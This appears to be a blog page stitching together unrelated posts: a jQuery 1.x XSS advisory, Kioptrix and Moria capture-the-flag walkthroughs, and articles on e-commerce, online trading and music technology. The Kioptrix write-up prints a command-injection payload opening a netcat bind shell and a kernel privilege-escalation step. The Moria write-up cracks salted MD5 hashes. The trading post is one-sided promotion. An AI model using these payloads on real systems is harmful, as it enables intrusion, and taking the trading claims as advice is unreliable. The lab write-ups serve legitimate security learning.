A jQuery 1.x vulnerability exists and no fix is planned

I haven’t seen much talk about this issue around the Internet, so I thought I’d present what I’ve learned for others to be aware of. It mainly has to do with the fact that jQuery 1.x (and 2.x, for that matter) have been superseded by 3.x, yet they are still thriving in many, many projects, applications, and websites to this day.

While doing a security review of some code the other day, a retirejs scan informed me that jQuery 1.x contained a Medium vulnerability regarding cross-domain requests in ajax. According to Snyk:

“Affected versions of the package are vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain ajax request is performed without the dataType option causing text/javascript responses to be executed.

Remediation: Upgrade jquery to version 3.0.0 or higher.”

“Upgrading to 3.0.0 or higher seems pretty drastic,” I thought to myself. Well, according to a comment I found on jQuery’s GitHub page, this is actually their stance, and they don’t plan on patching 1.x because it is a ‘breaking change’:


So it would behoove you to upgrade to jQuery 3 if you don’t want to be susceptible to this vulnerability. The magnitude of that may seem rather staggering if you consider all the projects across just about everything (WordPress plugins, Drupal modules, etc etc) that bundle the 1.x version of jQuery, and haven’t updated it in years.

While the vulnerability is only reachable if you make cross-domain ajax calls without an explicit dataType, this is but one risk that has come to light for which there will be no fix. And it’s not exactly reasonable to assume that developers know they need to avoid that if they intend to use jQuery 1.x.
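To make the Snyk description concrete, here is an added example (my own code, not jQuery’s) that models the decision jQuery 1.x/2.x make when an ajax response arrives with no dataType set, beside the rule jQuery 3.0 adopted. It is a simplified model: jQuery’s real Content-Type sniffing and origin comparison have more cases, and the function and variable names are this example’s own.

```python
import re
from urllib.parse import urlsplit

# Added example, not jQuery's own code: a simplified model of response handling
# in jQuery 1.x/2.x versus jQuery 3.0 for the "no dataType given" case.

SCRIPT_TYPES = re.compile(r"(?:java|ecma)script", re.I)


def is_cross_domain(page_origin, url):
    """True when url is absolute and its scheme://host[:port] differs from page_origin."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return False  # relative URL: same origin as the page
    origin = f"{parts.scheme}://{parts.netloc}".lower()
    return origin != page_origin.lower()


def legacy_response_action(options, content_type, page_origin):
    """jQuery 1.x/2.x: without dataType the response Content-Type picks the
    converter, and a script Content-Type means the body is evaluated, even
    when the response came from another origin."""
    data_type = options.get("dataType")
    ct = (content_type or "").lower()
    if data_type == "script":
        return "execute"
    if data_type:
        return f"convert:{data_type}"  # caller pinned the type; no auto-eval
    if SCRIPT_TYPES.search(ct):
        return "execute"  # the dangerous branch: executed regardless of origin
    if "json" in ct:
        return "convert:json"
    if "xml" in ct:
        return "convert:xml"
    return "convert:text"


def jquery3_response_action(options, content_type, page_origin):
    """jQuery 3.0 rule: a cross-domain script response is executed only when
    the caller explicitly asked for dataType: 'script'."""
    action = legacy_response_action(options, content_type, page_origin)
    if (action == "execute" and options.get("dataType") != "script"
            and is_cross_domain(page_origin, options["url"])):
        return "convert:text"
    return action


if __name__ == "__main__":
    page = "https://app.example.com"
    call = {"url": "https://api.example.net/data"}  # no dataType, cross-domain
    print("jQuery 1.x:", legacy_response_action(call, "text/javascript", page))
    print("jQuery 3.x:", jquery3_response_action(call, "text/javascript", page))
```

The practical reading for code stuck on 1.x: pinning dataType (for example dataType: "json") on every cross-domain call closes this branch, because the converter is chosen by the caller rather than by whatever Content-Type the remote server chooses to send.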

The longer jQuery 1.x sits in your project, the higher a risk it becomes.

As the impending OWASP Top-10 for 2017 says, “Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.”

Long story short: Keep your bundled libraries up to date!

Kioptrix 1.4 (VM 5) Walkthrough

This evening I am finally catching up on write-ups of the Virtual Machine penetration testing (and subsequent pwnage) I have been working on. This is the second one I finished up and got ready to share, in case anyone finds it useful. The Kioptrix series of VMs are available on vulnhub.com, and you can download them to practice your hacking skills with at any time, for free.

Having already conquered the preceding 4 Kioptrix VMs, I started this one a while ago, but I hadn’t circled back to finish it. I figured it was time to complete the last of the Kioptrix boot2root challenges. This one was difficult!


netdiscover turned up as the IP for this target VM.

On port 80, just a default Apache “It works!” message, and 8080 is a forbidden 403 message. Worth noting that for later.


Summary of Interesting finds:
OpenSSL exploit
Older Apache
Older PHP

Finding Directories


Turned up index.html (nothing new) and cgi-bin. Blah.


Tried various wordlists. Nothing turned up with this either.

mod_ssl vulnerability

Nikto did mention this vulnerability, so I took a deeper dive:

This is that same old OpenFuck vuln I ran into in Kioptrix 1.1. I was unable to get it to compile then, so I didn’t feel like wasting time on it now.

Source Code to a PHP app

I had never looked at the source code of the Apache “It Works!” default page, and I kicked myself when I realized that. In the source code was a handy comment:

<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">

Appending pChart2.1.3/index.php to the URL got me to some crappy PHP app:

The app looks like it would have a load of issues based on what it does and how it does it. An Exploit DB search reveals it does:


Directory Traversal sounds useful!

Using the exploit at Exploit DB, I found /etc/passwd:

Poking Around

I was unable to turn up anything useful in any of the /etc files I could read. I started looking up where things live in FreeBSD, since the locations were likely different from the Linux distros I am used to.

That said, I thought that the Apache config file would be a good place to start, as it might illuminate additional info such as usernames or locations of password files. I might also find out if anything else was hidden on the website.

According to this page https://www.freebsd.org/doc/handbook/network-apache.html the httpd.conf file is here:

I had to figure out that the x in that path should be a 2, since this server is running Apache 2.2

So that worked:

So what was relevant in the httpd.conf file?

Listen 80
Listen 8080

I already knew 80 was listening, and 8080 was reported as open but returning a 403 when trying to visit it in a web browser.

DocumentRoot "/usr/local/www/apache22/data"

That’s where Apache serves files from on FreeBSD.

This VirtualHost section looked interesting, as it explained the 403 errors I was getting when visiting the :8080 port

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser

So the :8080 virtual host is guarded by requiring a specific browser User-Agent string. Time to install User Agent Switcher add-on for Firefox. I prefer the one by Chris Pederick.

Internet Explorer 6 identifies itself with a User-Agent beginning “Mozilla/4.0 (compatible; MSIE 6.0; …)”, which satisfies the rule’s prefix match (SetEnvIf tests a regex anchored at the start of the header, not an exact string), so I set my User Agent to IE6, and then I was able to get to the :8080 page:

Clicking that led me to yet another crappy PHP app!
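Since the gate above is just a regex on a client-supplied header, it is worth seeing exactly what it accepts. The following is an added example (my own code, not part of the original walkthrough) that models the SetEnvIf rule from the httpd.conf excerpt and builds a request carrying a User-Agent that passes it; the target URL is a placeholder and the fetch helper is not invoked because it needs the live VM.

```python
import re
import urllib.request

# Added example: model of "SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser"
# followed by "Allow from env=Mozilla4_browser" under "Order allow,deny".
# SetEnvIf matches a regex anchored at the start of the header value, so any
# User-Agent that merely begins with "Mozilla/4.0" sets the variable.
UA_GATE = re.compile(r"^Mozilla/4\.0")

# Internet Explorer 6's string starts with the token the rule looks for.
IE6_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
# A modern Firefox string starts with Mozilla/5.0 and gets the 403.
FIREFOX_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"


def passes_ua_gate(user_agent):
    """True if Apache would set Mozilla4_browser and therefore allow the request."""
    return UA_GATE.match(user_agent) is not None


def build_request(url, user_agent=IE6_UA):
    """A GET for url with the spoofed User-Agent (urllib's default UA would be refused)."""
    return urllib.request.Request(url, headers={"User-Agent": user_agent})


def fetch(url, user_agent=IE6_UA, timeout=10):
    """Perform the request against the VM; returns (status, body)."""
    with urllib.request.urlopen(build_request(url, user_agent), timeout=timeout) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    for ua in (IE6_UA, FIREFOX_UA, "Mozilla/4.0", "curl/7.52.1"):
        print(f"{'allow' if passes_ua_gate(ua) else 'deny ':5s} {ua}")
    # Equivalent one-liner from a shell: curl -A "Mozilla/4.0" http://<target>:8080/
```

Note that the bare string "Mozilla/4.0" is enough; the browser add-on is a convenience, not a requirement, and a User-Agent check like this is an obscurity measure rather than access control.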

Attacking the PHPTAX app

This app smelled like it was choc-full of fun exploits. A quick Google search revealed exactly that.


This injects a command through the URL. The tail of the request is :;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make, which decodes to ;nc -l -v -p 23235 -e /bin/bash; and makes netcat listen on the target on port 23235 and hand /bin/bash to whoever connects. That is a bind shell rather than a reverse shell: you connect to the target on that port instead of running a listener on the attacking machine.

Trying to set up a netcat listener using various methods wasn’t working. I tried various ports and different things from the exploit-db entry (the other URL they mentioned), but had no luck.

Was there already an exploit in Metasploit?

That would be a “yes.” I thought doing it by hand would be more noble and educational, but alas, that proved to be untrue. Except that I learned I was down a rabbit hole. Off to metasploit I went…

That worked pretty well, and I found myself with a command shell.

Looks like I was the www user/group. I set out to escalate those privileges. After looking around for quite some time without finding anything too promising, I started looking into OS/kernel vulnerabilities.

uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

FreeBSD 9.0 seemed pretty old. A couple of promising leads turned up when looking for exploits:

Privilege Escalation

So I had 2 exploits to work with, just needed a place I could write files. Turns out the original web directory I was in when I got the reverse shell was perfect:


touch me
cat me

Next, I needed to get the exploit file over to the target machine. I wasn’t sure how to do this, so I Googled it. This helped: https://netsec.ws/?p=292. Or so I thought. I couldn’t get it transferred with netcat and I’m still not sure why.

More Googling led me to ‘fetch’ which is installed on the FreeBSD machine.

So I set up a quick web server to serve up the exploit file from my Kali box using Python 2’s SimpleHTTPServer module (on Python 3 the equivalent is python3 -m http.server 80). From the directory where the exploit file (26368.c) resides:

python -m SimpleHTTPServer 80

Then from the reverse shell on the target machine, fetch the file:


Compile that sucker:

gcc 26368.c

Then run it:



And the flag is in /root/congrats.txt

You should read the congrats.txt file and look into what it says, if you made it this far. There are some opportunities to learn about what you just did in there!

Moria: A Boot2Root VM Walkthrough

Moria is a relatively new boot2root VM created by Abatchy, and is considered an “intermediate to hard” level challenge. I wasn’t sure I was up for it since I’ve only been doing this for a few months, but much to my delight I conquered this VM and learned a lot in the process. This experience will certainly help as I prepare for the OSCP certification.

While Abatchy says, “No LOTR knowledge is required ;),” I found that my LOTR knowledge came in quite handy.

Getting Started

My setup:

  • MacBook running MacOS (Sierra)
  • VMWare Fusion running:
  • Kali Linux (latest)
  • Moria VM

Once the VM was downloaded and running in VMWare, I started through various enumeration techniques that I typically go through when starting to penetration test a box. I’ll omit the irrelevant ones in this write-up.



This tool revealed the IP of this machine on my network:


I used nmap -v -sS -A -T4
and nmap -sS -sV -O

21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
MAC Address: 00:0C:29:E8:75:4F (VMware)
Device type: general purpose
Running: Linux 3.X|4.X

So HTTP, FTP, and SSH were running. I started by checking out HTTP and visiting in a web browser. Here’s what I got:

The image of the West Door of Moria is from LOTR. This door was a trick door in the book and movies, and it required some “outside the box” thinking in order to gain entry. I remembered this from the books, and re-familiarized myself with the details via a Google search:

From http://tolkiengateway.net/wiki/Doors_of_Durin:

“On 13 January 3019 the Fellowship of the Ring entered Moria through the Doors,[5] but initially Gandalf could not find out the password to open them. Merry Brandybuck unknowingly gave Gandalf the answer by asking, “What does it mean by speak, friend, and enter?” When Gandalf realized that the correct translation was “Say friend and enter” he sprang up, laughed, and said “Mellon”, which means “friend” in Sindarin, and the Doors opened. Shortly thereafter, the Watcher in the Water attacked the Fellowship and shut the Doors behind them.[1]”

Good info that might come in handy later 😉


Running dirb led to the discovery of a directory at It contained a link to /h/, and so on. Traversing down the links led to:

The page said “Knock knock”
Was this a reference to port knocking? I thought that might be worth checking out later if I could find more info about a sequence.

At this time I was unable to find much more to work with related to the website and HTTP. The usual nikto and other apache/web-related stuff didn’t turn much up. I turned to FTP.


Trying to connect via FTP turned up some interesting info:

220 Welcome Balrog!

Clearly, the Lord of the Rings theme was running deep. I wondered if the password would be “mellon,” since that was what got the LOTR party into the gates of Moria. I couldn’t get that to work, and I wasn’t sure about a username.

Revisiting the website

Poking around the website some more, I DISCOVERED SOMETHING IMPORTANT!!!
When I browsed to
It gave me something different the next time. I found that a different quote would appear with each page load. I kept refreshing and collected all of the following:

Knock Knock
Is this the end?
Too loud!
Dain:”Is that human deaf? Why is it not listening?”
Nain:”Will the human get the message?”
Is this the end?
“We will die here..”
Ori:”Will anyone hear us?”
Nain:”Will the human get the message?”
Telchar to Thrain:”That human is slow, don’t give up yet”
Maeglin:”The Balrog is not around, hurry!”
Balin: “Be quiet, the Balrog will hear you!”
Oin:”Stop knocking!”
“Eru! Save us!”

A couple of weeks passed at this point, as I went out of town and had other things going on, but it gave me an opportunity to think about Moria and to come back with a fresh perspective.


Tried a bunch of other things, but finally tried doing SSH to the server and was prompted for a login.
Based on the FTP connection saying “Welcome Balrog!” I assumed that Balrog was a username. I also assumed that Mellon was the password knowing what I know about the LOTR story. Lastly, I realized I probably needed to try various capitalizations.

Using the login combo of Balrog / Mellon I got this:


Wrong gate? OK. I went back to try FTP with the Balrog/Mellon auth combo and got in:

Silly me. The username had been right there in front of me when I was trying FTP before. Nothing in the directory I logged into turned up anything, but I was able to cd .. up to /

I could go many places with basic dir navigation, but much was not allowed. For example, could get into /etc but not look at passwd. I couldn’t find anywhere that I could upload anything, and none of the important system files you’d typically check were allowed to be viewed.

I went to /var/www/html and found a directory that dirb would never have discovered:

Viewing that page in my web browser showed a handy table of what appeared to be hashes:


I set off to see what those passkeys could do. They didn’t seem to work as-is for SSH or FTP, so I knew they’d need to be operated on somehow.

hash-identifier said they were likely MD5 hashes:

Without a salt I wasn’t sure how I’d use that information.

I tried various things with Hashcat and John the Ripper, but had no luck. I was stumped for a while until I looked under the hood at the source code of that page at

Note: Looking at the HTML source code is something I always forget to do, and it has bitten me more than once!

At the bottom of the source code I found what appeared to be the salts:


So I had the salts for those MD5 hashes, and I had what looked like the format for using them:



This next part took me a lot of reading and learning, as I’d never really run into this before in my rather limited experience, and I had only a basic knowledge of Hashcat and John the Ripper. While it took some time, it turned out to be a great opportunity to learn.

Ultimately, based on what I had read in various seedy places of the Internet’s underbelly, I created a file called hashes.txt with these contents, based on the HTML chart found above, and added the salts to each line (after the $) respectively:


I still needed to figure out the right format for running through John the Ripper though, so more research was needed. I turned to these places:

http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats – not much help here.
https://github.com/piyushcse29/john-the-ripper/blob/master/doc/DYNAMIC – found the solution here.

Based on the chart on the documentation page for DYNAMIC, the format mentioned in the source code would work with this:

dynamic_6 | md5(md5($p).$s)

I next tried that on the hashes.txt file:

root@kali:~/moria# john --format=dynamic_6 hashes.txt
Using default input encoding: UTF-8
Loaded 9 password hashes with 9 different salts (dynamic_6 [md5(md5($p).$s) 128/128 AVX 4×3])
Press ‘q’ or Ctrl-C to abort, almost any other key for status
magic (Telchar)
abcdef (Dain)
spanky (Ori)
fuckoff (Maeglin)
flower (Balin)
rainbow (Oin)
darkness (Thrain)
hunter2 (Fundin)


I had a list of passwords for each user. Only one of these worked for logging in via SSH, and that was Ori’s account.
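To show what dynamic_6 actually computes and what the hashes.txt lines look like, here is an added example (my own code, not John the Ripper’s and not from the original write-up). It implements md5(md5($p).$s), parses John’s $dynamic_6$<hash>$<salt> input format, and runs a small wordlist against it. The salts and hash values below are constructed for the demo; the page’s real values are not reproduced. The usernames and two of the passwords are the ones the john run above recovered.

```python
import hashlib

# Added example, not part of the original write-up: dynamic_6 = md5(md5($p).$s).
# In John's dynamic formats the inner md5($p) is its lowercase hex string, and
# the salt is appended to that string before the outer MD5.


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def dynamic_6(password: str, salt: str) -> str:
    """md5(md5($p).$s): hex of the inner MD5, concatenated with the salt, hashed again."""
    inner = md5_hex(password.encode())
    return md5_hex((inner + salt).encode())


def format_john_line(user: str, digest: str, salt: str) -> str:
    """One hashes.txt line in the form John expects: user:$dynamic_6$hash$salt."""
    return f"{user}:$dynamic_6${digest}${salt}"


def parse_john_line(line: str):
    """Split 'user:$dynamic_6$hash$salt' into (user, hash, salt)."""
    user, tag = line.split(":", 1)
    prefix = "$dynamic_6$"
    if not tag.startswith(prefix):
        raise ValueError(f"not a dynamic_6 line: {line!r}")
    digest, salt = tag[len(prefix):].split("$", 1)
    return user, digest, salt


def crack(lines, wordlist):
    """Return {user: password} for every hash some wordlist entry reproduces."""
    found = {}
    for line in lines:
        user, digest, salt = parse_john_line(line)
        for word in wordlist:
            if dynamic_6(word, salt) == digest:
                found[user] = word
                break
    return found


# Constructed test data: salts invented here, two passwords from the john output above.
SAMPLE_SALTS = {"Ori": "q9Mz", "Fundin": "e7Kp", "Balrog": "x3Rt"}
SAMPLE_LINES = [
    format_john_line("Ori", dynamic_6("spanky", SAMPLE_SALTS["Ori"]), SAMPLE_SALTS["Ori"]),
    format_john_line("Fundin", dynamic_6("hunter2", SAMPLE_SALTS["Fundin"]), SAMPLE_SALTS["Fundin"]),
    # Balrog's (constructed) password is not in the wordlist, so it stays uncracked.
    format_john_line("Balrog", dynamic_6("not-in-list", SAMPLE_SALTS["Balrog"]), SAMPLE_SALTS["Balrog"]),
]
WORDLIST = ["password", "spanky", "flower", "hunter2", "rainbow"]

if __name__ == "__main__":
    for user, pw in crack(SAMPLE_LINES, WORDLIST).items():
        print(f"{pw} ({user})")
```

The per-user salt is why the same password hashes differently for each account and why a plain MD5 lookup table did not work; it does nothing against a dictionary run like this one, because the scheme is a single unsalted-speed MD5 pair per guess.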

Bash Shell Obtained

Got a Bash shell with Ori’s login via SSH:


-bash-4.2$ ls -al
total 8
drwx------ 3 Ori notBalrog 55 Mar 12 22:57 .
drwxr-x---. 4 root notBalrog 32 Mar 14 00:36 ..
-rw------- 1 Ori notBalrog 1 Mar 14 00:12 .bash_history
-rw-r--r-- 1 root root 225 Mar 13 23:53 poem.txt
drwx------ 2 Ori notBalrog 57 Mar 12 22:57 .ssh

Starting in Ori’s home directory, I checked out the .ssh directory to see what might be relevant.

It looked like Ori had logged into localhost before, since it showed up in known_hosts. Why would he be doing that unless he needed to log in as someone else? Perhaps as root?

root Obtained – All That is Gold Does Not Glitter

Huh…well that last part was easier than I thought it might be. Thanks to Abatchy for providing this challenge. I learned a lot!


A Guide To Running An E-Commerce Business

Since Tim Berners-Lee created the World Wide Web in the early 1990s, the internet has changed the way that the world operates. For one, it is a democratizing force. The Arab Spring of 2010 was enabled in part by the fact that the protesters involved were able to communicate with each other on their phones. The internet has also allowed for more people to educate themselves. Sites like Open Culture believe that the Internet is able to act as a tool to proliferate information, university courses and art and literary criticism for people who may otherwise not have access to these things. It allows for all sorts of conversations to take place between people who may not otherwise have been able to communicate. One of the potential problems with this, however, is that the internet facilitates niche communities to exist. If a person only reads certain websites they can find themselves in a sort of digital echo chamber where their own opinions, thoughts and arguments are repeated back to them and are therefore validated and encouraged. Whether this sort of thinking has led to a greater degree of partisanship in our online and social discourse is debatable. On a personal level, the internet has changed things too. Facebook now has an estimated 1.9 billion unique monthly users and has enabled people to make new friends, and form new romantic relationships while also resurrecting old ones. It is also cited in a third of divorces today, so it is not all good.

However, as a potential business opportunity, it is unparalleled. The global e-commerce market is thought to be worth about $22 trillion with m-commerce (transactions that take place on mobile devices) being worth an estimated $3.2 trillion. Remarkably, amongst small businesses in 2016, 46% did not have a website. Of the 54% which did, 23% of those websites were not mobile friendly. These statistics reveal that a lot of people have still not realized the potential of the internet as a tool for running a business. The reality of the modern world is that if someone needs information, they will likely turn to Google. The prevalence of phonebooks or business directories has steadily declined for exactly this reason. Not having a website is therefore to condemn yourself to only being able to do business with customers who are in your geographic vicinity. If you live in a major city, that still may be millions of people, but with 3.7 billion people now having access to the internet, there really is no reason not to embrace the digital revolution. Besides, the internet is also a great marketing tool.

The infrastructure of online commerce is such that if you are smart, you can easily advertise your business for a fraction of the cost that it would ordinarily cost. For example, with sites like Facebook, Twitter, and Instagram, if you manage to produce viral content, you can reach millions of people within a few hours. Besides, the cost of using these websites to promote yourself or your business is nothing. The only problem is that everyone else is trying to capture the zeitgeist too so it can sometimes be a rather crowded market. It is especially important when you are advertising online to be sensitive to the cultural considerations of the people who may see it. With the internet, that is people from nearly every country on earth. It can often be quite expensive to plan, create and launch an advertising campaign and if it is not successful, that money will be wasted. The recent Pepsi commercial featuring Kendall Jenner created a backlash because it was thought to co-opt and infantilize a political struggle that is real to a lot of marginalized people. Using that to sell your products is rather distasteful anyway, but it is especially embarrassing when the corporate desire to fit in and appeal to young people is so blatant and unsophisticated. There are so many examples of international marketing campaigns that were not cognizant enough of the cultures in which they wished to expand. However, being sensitive to these things is not just a moral issue, it could help prevent you losing the potential revenue of massive markets around the world.

There are particular benefits to running an online only business though. First, with retail companies, in particular, there are a lot of serious expenses that have to be met in order to start trading. Opening a brick and mortar store is expensive because the store itself needs to be designed in such a way that it is appealing to the customers as well as safe and compliant with lots of different health and safety codes. There is then the issue of hiring friendly, competent staff that have a working knowledge of the products and also how to deal with customers. The cost of a warehouse for stock is also important. When you run an online store, you will still need a warehouse, but you can save lots of money on running an actual store. Your overheads will be a lot lower, and you will, therefore, be able to sell your products for reduced prices as well. One of the costs that online businesses have to worry about though is the sometimes startling prices of shipping products to customers. While most online purchases come with a shipping fee, they do not always cover the entire cost of sending the package, especially if it is an international delivery so the e-commerce company will have to subsidize part of the transaction. They obviously consider this a feasible option because they anticipate future business with the customer. However, this is not something on which you can always rely.

There are particular security issues of which you need to be aware as well. When a customer inputs their sensitive financial information into the payment gateway on your website, they are taking a risk. The threat of non-ethical hackers compromising your computer systems and stealing that information is real. In fact, it has happened to a lot of major companies. It is serious because this sort of thing can completely ruin your reputation with your customers. If they cannot trust you with their sensitive information, they simply will not shop with you. If you fail to put the necessary measures in place to protect yourself against this sort of threat, you may find that you face legal problems. It is your ethical responsibility to protect this information. However, it is not always just outside forces which you should protect yourself against. A poll conducted in 2011 found that 60% of people steal from a company that they are leaving. 65% stole email lists, 45% took non-financial business information, 39% took customer contact details, 35% took employee records, and 19% were bold enough to steal financial information. These are corporate crimes, and if you think you were the subject of fraud, you should consider speaking to a whistleblower attorney. Setting a precedent and clearly demonstrating that you do not condone such behavior is important, but you should also be aware that losing this information can seriously affect how well you are able to compete with other businesses. You have legal recourses which you should use.

Finally, whatever you choose to sell, you need to make your products unique. People can often be indecisive when they are working around a mall because there are so many different products available to them. However, when it comes to the internet, there are many more. Managing to stand out in this environment is not easy, but it can be immensely profitable, a fact demonstrated by the CEO of Amazon Jeff Bezos now being worth an estimated $84 billion.

4 Compelling Reasons You Should Start Trading Online

The internet is home to so many weird and wonderful things. No matter where you click, you’re bound to find something of interest.

If you surf the web for long enough, you may stumble across the online trading scene. This is often known as online investing, and is a popular way for many people to invest their spare cash. It follows a similar process to regular investing; the main difference is that everything is done via the internet.

What we want to discuss today is why you should consider trading online. I’ve put together four compelling reasons that will show you why it’s such a good idea:

You Can Trade So Many Different Things

One of the best things about trading online is that you can invest and trade so many different things. You’re really not limited by anything: if you can think of it, you can trade it. Of course, there are all the usual suspects that most people think of when they consider trading. You can trade stocks online, you can dabble in forex trading, and many more traditional methods.

As well as all this, you can invest in many other things too. Bitcoin is a very popular online investment and something you can trade. As you’ll note from this Coinbase review, bitcoin has increased in value quite a bit over the years and continues to do so. This makes it a great thing to trade as the opportunity for making money is increased. Overall, the fact you have so many options to choose from makes online trading a very promising prospect. With so many different things, you can dabble in multiple trades and make even more money.

There Are Loads Of Platforms To Help You

Another compelling reason to start trading online is that there are loads of platforms out there to help you get started. A trading platform is essentially a website that lets you buy and sell different assets. It doesn’t matter what you’re interested in trading, it could be stocks, forex, indices, bitcoin – there’s always a platform out there that you can use.

These platforms are designed to help you buy and sell whatever it is you’re trading. They bring the market to your computer, meaning you can trade things from all over the world. Everything is very simple thanks to the platforms at your disposal. It certainly makes trading more accessible, as you don’t need to go to a stock exchange, and you don’t need to hire a broker. Some platforms come with online or automated brokers that can help you find the best trades too; it’s a win-win situation!

You Don’t Have To Leave Your Bedroom

Is there a better reason to start online trading other than the fact you don’t have to leave your bedroom? You can literally wake up, get your laptop, and start trading without getting out of bed. It’s incredibly simple and requires very little effort on your behalf. As mentioned before, you don’t have to go to a stock exchange or anything complicated like that. Just trade from your bedroom!

Likewise, you can also trade from anywhere in the world. If you’re on holiday, you can still fire up your laptop or mobile phone and make some trades.

You Can Earn A Lot Of Money

If you’ve read the previous three reasons and are still on the fence, this reason will tip you over and help make up your mind. The simple fact is, you can earn a lot of money when trading online. It allows you to constantly stay in the loop and make trades whenever you want, wherever you are. As a result, you could sell something at the right time to make loads of cash, or buy something at the right moment to get a real cheap investment.

You don’t have to be extremely active and buy/sell like crazy every day either. You can invest and then sell at a much later date if that’s how you prefer to trade as well. If you want to earn some extra money on the side, this is a really great way to do so. Online trading can help you turn your savings into something far more substantial.

These four reasons prove why you should consider trading online. It’s a very smart thing to do and a great way to spend your free time. Plus, it’s so easily accessible, and there are so many options to choose from. If you’re looking to do something with some extra cash, you may as well invest it online!

How Technology Has Changed Music

Whenever you switched on the radio as a kid, you’d have to fiddle with the signal and the aerial to get a clear sound on the songs being played by your favourite radio station. The strength of the signal used to vary from room to room in the house, but thanks to the developing world of technology, music has changed dramatically.

Long gone are the days of cassette tapes and scratchy record players. Audio technology is constantly evolving and as yet hasn’t reached a peak! There have always been changes in music, and it’s not just that the popularity of rap and grime music has overtaken traditional bands. We’re going to look at the ways that technology has helped music to evolve over the last few decades, so that you can see why our world is a better place with technology on our side:

  • Production. Music has so much gadgetry involved, from synthesizers that use a high frequency oscillator to DAWs and social media streaming services. The current technology in music has made it much easier for individual musicians to produce their own music, whereas before they would have needed a production company on their side to get it all done. People demand music right now, so waiting for a release date for a physical album has become a thing of the past. Home studios of a professional quality are so much easier to set up than ever before, changing the whole face of production.
  • Profit. Due to the change in the way music is being produced, music production companies are now challenged in how they make their profit. The physical records and CDs you used to see in the shops all the time have given way to online streaming, with downloadable music now banking more in sales than ever before.
  • Instruments. There used to be a time where being in a band meant everyone had a role and instrument to use and others would sing along. Now, technology and music programs have made it easier for people to make music from a computer, overlaying instrumentals and beats with vocals. It makes it possible that one person can now play the music of a whole band. For some, this has ruined traditional music, and for others it has allowed them a new way of getting their sound into the world.
  • Correction. One of the most popular reasons to own records is to hear the scratches and tiny imperfections in the songs. With digital editing and pitch correction, there’s no such thing as an imperfection. Music and voice can be corrected with the touch of a button, changing someone with the right look and the wrong voice into someone with an angelic singing ability.
  • Sound. The last, and probably biggest change to music has been the ability to create new sounds not heard before. Laying music over beats that couldn’t be reproduced without an orchestra means a whole new world of music is opened up. It’s so much easier to be creative with music, with technology on your side.